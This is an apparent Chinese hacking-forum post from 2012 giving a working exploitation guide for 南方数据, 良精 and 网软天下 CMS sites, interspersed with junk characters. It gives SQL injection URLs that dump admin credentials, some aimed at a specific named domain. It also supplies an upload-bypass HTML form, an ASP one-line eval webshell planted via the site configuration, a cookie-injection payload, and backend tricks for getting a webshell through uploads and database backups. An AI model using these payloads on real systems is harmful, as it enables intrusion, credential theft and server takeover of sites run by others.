中国网络渗透测试联盟

标题: 南方数据网站管理系统注入漏洞&后台拿WebShell [打印本页]

作者: admin    时间: 2012-12-4 11:06
标题: 南方数据网站管理系统注入漏洞&后台拿WebShell
  /Databases/0791idc.mdb
6 C9 e; X  \0 g& e1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 6 a! _2 \/ J, U
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7% Y4 [' a6 _# w/ O& j6 U, h
直接暴管理员帐号密码(md5)
  T, p4 c/ f" W, ?+ W2.登陆后台( \3 O1 m' W, X6 {6 j2 W
3.利用编辑器上传:
2 d4 T" _) U, ^( F* X访问admin/southidceditor/admin_style.asp$ P% c$ I) ?  Z( q
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.6 z' ]# @8 e  E- a) R6 T

1 [8 @: Z" I* ~2 F/ d========================================
' P& R+ K6 |; B  M  _! q/ J8 p/ _  ~+ V; [" n
参考资料整理:
& H& l  _) I! E* h6 r7 _南方数据、良精系统、网软天下漏洞利用
/ s* R5 n( |: }
4 d8 \* v+ x# G8 r. F) p1、通过upfile_other.asp漏洞文件直接取SHELL; C7 i0 C; e1 W
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:1 @# a" Y3 v$ A0 F3 D; c2 N
<HTML><HEAD>
; V6 U1 y9 T3 M8 M<META http-equiv=Content-Type content="text/html; charset=gb2312">
3 P2 }. [, d5 l$ L<STYLE type=text/css>BODY { 8 C: A1 A* k) A$ _5 m$ L
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
8 G% P  b" s; C! A' [7 u}
3 i* S+ _& h. N.tx1 { . l1 P* y$ |$ p0 e
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
0 E5 m. t% O5 {1 o" W}
* P2 t; ^+ A& \  n+ G4 c/ N</STYLE>
- A  {% x, c8 ]6 \6 ?# H0 V<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> $ B2 x2 p0 _. @# _) O& O
<BODY leftMargin=0 topMargin=0> ; A- h% ~7 `0 k: }& l" y& s
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post $ e* I% d3 u0 c" S# C
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> $ }5 {2 k) }! r2 G
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
* P# L& s# ]8 e( z4 {; j) B5 k
: r$ [  X# ]- ^; D$ F. C# v4 o将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
6 |/ n+ E! v7 U4 V% S. }注:此方法通杀南方数据、良精系统、网软天下等
/ v) w8 z" [3 B
) D) D" s! S) e' d5 W2、通过注入秒杀管理员帐号密码,使用如下:
! D! `8 ?+ I1 a9 e$ whttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
/ X+ R* @" C, E% }以上代码直接暴管理员帐号和密码,取SHELL方法如下:0 [% x) C8 G" J( f1 n* X5 M9 ?
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
. Z0 |; m% ~+ T7 H成功把shell写入http://www.target.com/inc/config.asp2 I$ b2 a+ B3 C  C; u
这里一句话chr(32)密码是“#”
* r6 P, ?2 {5 C3 y3、cookie注入! r0 }$ W4 i8 O5 _6 }) p! J
清空地址栏,利用union语句来注入,提交:( O% N8 e( x6 w0 O% ]) d
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))% v  y+ R' t& [  x) a' U
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
1 `- E! c; i/ i& c. ~, T+ W  A- P8 J/ M注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。5 a; Y7 |" r8 ^
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)* Z! P) M& _0 z+ J
1 f* x1 Z# f: ^" e$ x  W( v* |; x
三、后台取SHELL方法总结
4 n$ P. S+ q; @% S! z- a0 _(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:- p" u0 X  H; ~- ?0 }; T( K
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,& ?6 F* }5 i6 a) Y
这时再打开一句话马的客户端,提交同样得到一个小马8 l+ C8 c/ I5 v
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)9 M& ^6 `8 B: B" y
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:6 ^  v! G2 a4 I) u
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
2 u6 f. w& w" b% M: i" L  \EnableUpload=false/ E% r2 D0 s. g: Q3 I

8 \4 A7 o% o2 Oend if & C1 g( e- `- d) @1 N  @, n
if EnableUpload=false then2 d: h& T: m. K
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
  f( r* o+ n8 k3 z0 Z  z& NFoundErr=true
7 i0 H8 z7 L# Z& r7 }- t( x- h3 R, Rend if
8 m. C9 k' o; J# q: q大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
5 \5 p' v( N3 R' ], {提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)* `* J: h/ y8 \+ ^3 U" M3 h
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
, H. S+ P% B: E6 l- A. x8 b
" T" b0 S% j# n点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
' `. F8 X! k, p4 _直接访问备份后的地址,就得到一个webshell3 J8 [; `# F# h( q4 @- b/ U4 v
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2